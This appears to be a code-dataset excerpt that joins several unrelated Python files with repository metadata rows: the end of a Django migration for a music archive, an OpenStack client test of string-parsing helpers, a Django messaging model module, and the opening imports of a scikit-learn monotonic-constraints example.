'reviewer': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'reviewer'", 'null': 'True', 'to': u"orm['auth.User']"}),
'set': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Set']", 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['archives.Tag']", 'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'archives.archivecollectivity': {
'Meta': {'unique_together': "(('archive', 'collectivity'),)", 'object_name': 'ArchiveCollectivity', 'db_table': "'archives_archive_collectivities'"},
'archive': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Archive']"}),
'collectivity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Collectivity']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']", 'null': 'True', 'blank': 'True'})
},
u'archives.archiveparticipant': {
'Meta': {'object_name': 'ArchiveParticipant'},
'archive': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Archive']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Person']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']"})
},
u'archives.audio': {
'Meta': {'object_name': 'Audio', 'db_table': "u'audio'"},
'abstract': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'acanthes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'annee': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'chemin_fichier': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_enregistrement': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'dateissued_portail': ('django.db.models.fields.TextField', [], {'db_column': "'dateIssued_portail'", 'blank': 'True'}),
'details_intranet_actuel_acda': ('django.db.models.fields.TextField', [], {'db_column': "'details_intranet_actuel_ACDA'", 'blank': 'True'}),
'duree': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'genre': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'horodatage_creation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'horodatage_modification': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intervenants': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'intervenants_audio'", 'symmetrical': 'False', 'through': u"orm['archives.IntervenantAudio']", 'to': u"orm['archives.Intervenant']"}),
'kf_id_intervenant_principal': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Intervenant']", 'null': 'True', 'db_column': "'kf_ID_intervenant_principal'", 'blank': 'True'}),
'kf_id_langue_1': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'langue_1'", 'null': 'True', 'db_column': "'kf_ID_langue_1'", 'to': u"orm['archives.Langue']"}),
'kf_id_langue_2': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'langue_2'", 'null': 'True', 'db_column': "'kf_ID_langue_2'", 'to': u"orm['archives.Langue']"}),
'kf_id_langue_3': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'langue_3'", 'null': 'True', 'db_column': "'kf_ID_langue_3'", 'to': u"orm['archives.Langue']"}),
'kf_id_lieu': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Lieu']", 'null': 'True', 'db_column': "'kf_ID_lieu'", 'blank': 'True'}),
'kf_id_orchestre': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Orchestre']", 'null': 'True', 'db_column': "'kf_ID_orchestre'", 'blank': 'True'}),
'lien_test_web': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_abstract': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_accesscondition': ('django.db.models.fields.TextField', [], {'db_column': "'oai_accessCondition'", 'blank': 'True'}),
'oai_genre': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_id': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_language_languageterm_1': ('django.db.models.fields.TextField', [], {'db_column': "'oai_language_languageTerm_1'", 'blank': 'True'}),
'oai_language_languageterm_2': ('django.db.models.fields.TextField', [], {'db_column': "'oai_language_languageTerm_2'", 'blank': 'True'}),
'oai_language_languageterm_3': ('django.db.models.fields.TextField', [], {'db_column': "'oai_language_languageTerm_3'", 'blank': 'True'}),
'oai_location_physicallocation': ('django.db.models.fields.TextField', [], {'db_column': "'oai_location_physicalLocation'", 'blank': 'True'}),
'oai_location_url_full': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_location_url_preview': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_origininfo_datecaptured': ('django.db.models.fields.TextField', [], {'db_column': "'oai_originInfo_dateCaptured'", 'blank': 'True'}),
'oai_origininfo_place': ('django.db.models.fields.TextField', [], {'db_column': "'oai_originInfo_place'", 'blank': 'True'}),
'oai_origininfo_publisher': ('django.db.models.fields.TextField', [], {'db_column': "'oai_originInfo_publisher'", 'blank': 'True'}),
'oai_physicaldescription_digitalorigin': ('django.db.models.fields.TextField', [], {'db_column': "'oai_physicalDescription_digitalOrigin'", 'blank': 'True'}),
'oai_physicaldescription_form': ('django.db.models.fields.TextField', [], {'db_column': "'oai_physicalDescription_form'", 'blank': 'True'}),
'oai_physicaldescription_internetmediatype': ('django.db.models.fields.TextField', [], {'db_column': "'oai_physicalDescription_internetMediaType'", 'blank': 'True'}),
'oai_publication': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_recordinfo_languageofcataloging_languageterm': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_languageOfCataloging_languageTerm'", 'blank': 'True'}),
'oai_recordinfo_recordchangedate': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_recordChangeDate'", 'blank': 'True'}),
'oai_recordinfo_recordcontentsource': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_recordContentSource'", 'blank': 'True'}),
'oai_recordinfo_recordcreationdate': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_recordCreationDate'", 'blank': 'True'}),
'oai_recordinfo_recordidentifier': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_recordIdentifier'", 'blank': 'True'}),
'oai_targetaudience': ('django.db.models.fields.TextField', [], {'db_column': "'oai_targetAudience'", 'blank': 'True'}),
'oai_titleinfo_title': ('django.db.models.fields.TextField', [], {'db_column': "'oai_titleInfo_title'", 'blank': 'True'}),
'oai_typeofresource': ('django.db.models.fields.TextField', [], {'db_column': "'oai_typeOfResource'", 'blank': 'True'}),
'oai_web_oai_mods': ('django.db.models.fields.TextField', [], {'db_column': "'oai_WEB_OAI_MODS'", 'blank': 'True'}),
'physicaldescription': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "'physicalDescription'", 'blank': 'True'}),
'remarque': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'subtitle': ('django.db.models.fields.TextField', [], {'db_column': "'subTitle'", 'blank': 'True'}),
'total_durees': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'type_document': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'type_ircam': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'typeofresource': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_column': "'typeOfResource'", 'blank': 'True'}),
'url_ecoute_extranet': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url_ecoute_internet': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url_ecoute_intranet': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url_ecoute_intranet_adresse': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'}),
'url_export_ircam': ('django.db.models.fields.TextField', [], {'db_column': "'url_export IRCAM'", 'blank': 'True'})
},
u'archives.contract': {
'Meta': {'object_name': 'Contract'},
'archive': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Archive']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nb_pages': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'archives.intervenant': {
'Meta': {'object_name': 'Intervenant', 'db_table': "u'intervenant'"},
'biographie': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'horodatage_creation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'horodatage_modification': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nom': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "'Nom'", 'blank': 'True'}),
'prenom': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'Pr\\xe9nom'", 'blank': 'True'}),
'prenom_nom': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'web_1': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'web_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
u'archives.intervenantaudio': {
'Meta': {'object_name': 'IntervenantAudio'},
'audio': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Audio']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intervenant': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Intervenant']"}),
'ordre': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'archives.langue': {
'Meta': {'object_name': 'Langue', 'db_table': "u'langue'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'languageterm': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "'languageTerm'", 'blank': 'True'})
},
u'archives.lieu': {
'Meta': {'object_name': 'Lieu', 'db_table': "u'lieu'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'placeterm': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'db_column': "'placeTerm'", 'blank': 'True'}),
'salle': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'})
},
u'archives.media': {
'Meta': {'object_name': 'Media'},
'archive': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Archive']", 'null': 'True', 'blank': 'True'}),
'collectivities': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Collectivity']", 'null': 'True', 'through': u"orm['archives.MediaCollectivity']", 'blank': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'confidentiality': ('django.db.models.fields.CharField', [], {'default': "'0'", 'max_length': '1'}),
'duration': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media': ('django.db.models.fields.CharField', [], {'max_length': '36', 'null': 'True', 'blank': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '192', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Person']", 'null': 'True', 'through': u"orm['archives.Participant']", 'blank': 'True'}),
'publisher': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'publisher'", 'null': 'True', 'to': u"orm['utils.Collectivity']"}),
'record_type': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'slideshow': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'work': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Work']", 'null': 'True', 'blank': 'True'})
},
u'archives.mediacollectivity': {
'Meta': {'unique_together': "(('media', 'collectivity'),)", 'object_name': 'MediaCollectivity', 'db_table': "'archives_media_collectivities'"},
'collectivity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Collectivity']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Media']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']", 'null': 'True', 'blank': 'True'})
},
u'archives.orchestre': {
'Meta': {'object_name': 'Orchestre', 'db_table': "u'orchestre'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'musiciens': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'nom_chef': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'}),
'nom_complet': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'db_column': "'nom complet'", 'blank': 'True'}),
'prenom_chef': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'}),
'role_chef': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'}),
'sous_titre': ('django.db.models.fields.TextField', [], {'db_column': "'sous titre'", 'blank': 'True'})
},
u'archives.participant': {
'Meta': {'object_name': 'Participant'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Media']"}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Person']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']"})
},
u'archives.set': {
'Meta': {'ordering': "['label']", 'object_name': 'Set'},
'comment': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'archives.shared': {
'Meta': {'object_name': 'Shared'},
'dailymotion': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['archives.Media']", 'unique': 'True'}),
'soundcloud': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'vimeo': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'youtube': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'archives.tag': {
'Meta': {'object_name': 'Tag'},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'events.event': {
'Meta': {'ordering': "['tree_id', 'lft']", 'object_name': 'Event'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['events.EventType']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['events.Event']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
u'events.eventtype': {
'Meta': {'object_name': 'EventType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': u"orm['events.EventType']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
u'utils.collectivity': {
'Meta': {'ordering': "['name']", 'object_name': 'Collectivity'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'utils.composer': {
'Meta': {'object_name': 'Composer'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Person']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']"}),
'work': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Work']"})
},
u'utils.person': {
'Meta': {'ordering': "['last_name']", 'object_name': 'Person'},
'biography': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '150', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '150'})
},
u'utils.place': {
'Meta': {'object_name': 'Place'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '765'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '765'}),
'hall': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'utils.role': {
'Meta': {'object_name': 'Role'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'utils.work': {
'Meta': {'object_name': 'Work'},
'collectivities': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Collectivity']", 'null': 'True', 'blank': 'True'}),
'composers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Person']", 'null': 'True', 'through': u"orm['utils.Composer']", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '384'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['archives']
| [
"[email protected]"
] | |
45b1e2030a82a579787b6264898649012691ae6a | e17eeedcd07cfbfe8879ba27654dc399964da466 | /openstackclient/tests/unit/network/test_utils.py | 6252d7f76644760b40d5c7515fda4ce8ec159195 | [
"Apache-2.0"
] | permissive | sapcc/python-openstackclient | 2ec0a0af8c7010fd12a8c92c3df1e70bb9e2c52d | 8aafc9e687b0dcf15709d4029b55b0271160f1ce | refs/heads/master | 2023-04-16T03:09:21.987741 | 2021-08-01T20:57:20 | 2022-04-05T17:16:52 | 96,403,544 | 0 | 0 | Apache-2.0 | 2023-04-04T01:36:45 | 2017-07-06T07:50:31 | Python | UTF-8 | Python | false | false | 2,051 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from osc_lib import exceptions
from openstackclient.network import utils
from openstackclient.tests.unit import utils as tests_utils
class TestUtils(tests_utils.TestCase):
def test_str2bool(self):
self.assertTrue(utils.str2bool("true"))
self.assertTrue(utils.str2bool("True"))
self.assertTrue(utils.str2bool("TRUE"))
self.assertTrue(utils.str2bool("TrUe"))
self.assertFalse(utils.str2bool("false"))
self.assertFalse(utils.str2bool("False"))
self.assertFalse(utils.str2bool("FALSE"))
self.assertFalse(utils.str2bool("FaLsE"))
self.assertFalse(utils.str2bool("Something else"))
self.assertFalse(utils.str2bool(""))
self.assertIsNone(utils.str2bool(None))
def test_str2list(self):
self.assertEqual(
['a', 'b', 'c'], utils.str2list("a;b;c"))
self.assertEqual(
['abc'], utils.str2list("abc"))
self.assertEqual([], utils.str2list(""))
self.assertEqual([], utils.str2list(None))
def test_str2dict(self):
self.assertEqual(
{'a': 'aaa', 'b': '2'},
utils.str2dict('a:aaa;b:2'))
self.assertEqual(
{'a': 'aaa;b;c', 'd': 'ddd'},
utils.str2dict('a:aaa;b;c;d:ddd'))
self.assertEqual({}, utils.str2dict(""))
self.assertEqual({}, utils.str2dict(None))
self.assertRaises(
exceptions.CommandError,
utils.str2dict, "aaa;b:2")
| [
"[email protected]"
] | |
5e521d0a7227ad3e4be3e4a0d4b7c4ea655d494e | 62491ec663dd603c8e72efca44b58ec31afdff39 | /up/apps/messaging/models.py | 427bf4dc50aadaa24e942f722bda5611e1813a76 | [] | no_license | chuck-swirve/up | 63a2d617cdbefaa1ac91cfbe09b28045344a5ed7 | a18f6118853df80694a33b81b710fca094f736db | refs/heads/master | 2021-01-18T22:12:53.238169 | 2016-08-22T02:27:29 | 2016-08-22T02:27:29 | 72,303,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,008 | py | from __future__ import (absolute_import, division, print_function,
unicode_literals)
from django.conf import settings
from django.db import models
from django.db import transaction
from common import models as common_models
class Inbox(common_models.BaseModel):
owner = models.OneToOneField(settings.AUTH_USER_MODEL,
related_name='inbox')
def has_unread_messages(self):
return self.get_unread_messages().count() > 0
def get_incoming_messages(self):
return self.received_messages.filter(
is_deleted=False
)
def get_outgoing_messages(self):
return self.sent_messages.all()
def get_unread_messages(self):
return self.get_incoming_messages().filter(
is_read=False
)
def get_conversations(self):
messages = self.get_incoming_messages() | self.get_outgoing_messages()
unread_convo_ids = self.get_unread_messages().values_list(
'conversation_id', flat=True)
convos = self.in_conversations.all().annotate(
has_unread=models.Case(
models.When(id__in=unread_convo_ids, then=True),
default=False,
output_field=models.BooleanField()
)
)
return convos
class Conversation(common_models.BaseModel):
subject = models.CharField(max_length=150)
participants = models.ManyToManyField(
Inbox, related_name='in_conversations')
def reply(self, from_inbox, content):
with transaction.atomic():
to_inbox = self.participants.exclude(id=from_inbox.id).first()
if to_inbox is None: # convo with self...
to_inbox = from_inbox
new_message = Message()
new_message.sender = from_inbox
new_message.recipient = to_inbox
new_message.content = content
new_message.conversation = self
new_message.save()
self.save()
class Message(common_models.BaseModel):
sender = models.ForeignKey(Inbox,
related_name='sent_messages')
recipient = models.ForeignKey(Inbox,
related_name='received_messages')
conversation = models.ForeignKey(Conversation,
related_name='messages')
content = models.TextField()
is_read = models.BooleanField(default=False)
@classmethod
def compose_new(cls, from_inbox, to_inbox, subject, content):
with transaction.atomic():
new_convo = Conversation(subject=subject)
new_convo.save()
new_convo.participants.add(from_inbox, to_inbox)
new_message = Message()
new_message.sender = from_inbox
new_message.recipient = to_inbox
new_message.content = content
new_message.conversation = new_convo
new_message.save()
return new_message
| [
"[email protected]"
] | |
c11e9e17d2a71e4dc915d7c7f64e14d6bf9b9f5b | 27dc0d3f94b947120657098db4139e0341b593ba | /examples/ensemble/plot_monotonic_constraints.py | 6146a3bb72db1065dd5cb68126e785a2a3bd57c8 | [
"BSD-3-Clause"
] | permissive | ABHIGPT401/scikit-learn | 06283a56290903d4831591cb2218798f0302df65 | 4448dd47162a04164d9edd771d1f5d73bcf9c4fe | refs/heads/main | 2023-09-01T09:55:03.066820 | 2021-10-07T04:58:50 | 2021-10-07T04:58:50 | 411,531,901 | 1 | 0 | BSD-3-Clause | 2021-09-29T04:39:58 | 2021-09-29T04:39:57 | null | UTF-8 | Python | false | false | 2,203 | py | """
=====================
Monotonic Constraints
=====================
This example illustrates the effect of monotonic constraints on a gradient
boosting estimator.
We build an artificial dataset where the target value is in general
positively correlated with the first feature (with some random and
non-random variations), and in general negatively correlated with the second
feature.
By imposing a positive (increasing) or negative (decreasing) constraint on
the features during the learning process, the estimator is able to properly
follow the general trend instead of being subject to the variations.
This example was inspired by the `XGBoost documentation
<https://xgboost.readthedocs.io/en/latest/tutorials/monotonic.html>`_.
"""
from sklearn.ensemble import HistGradientBoostingRegressor
from sklearn.inspection import PartialDependenceDisplay
import numpy as np
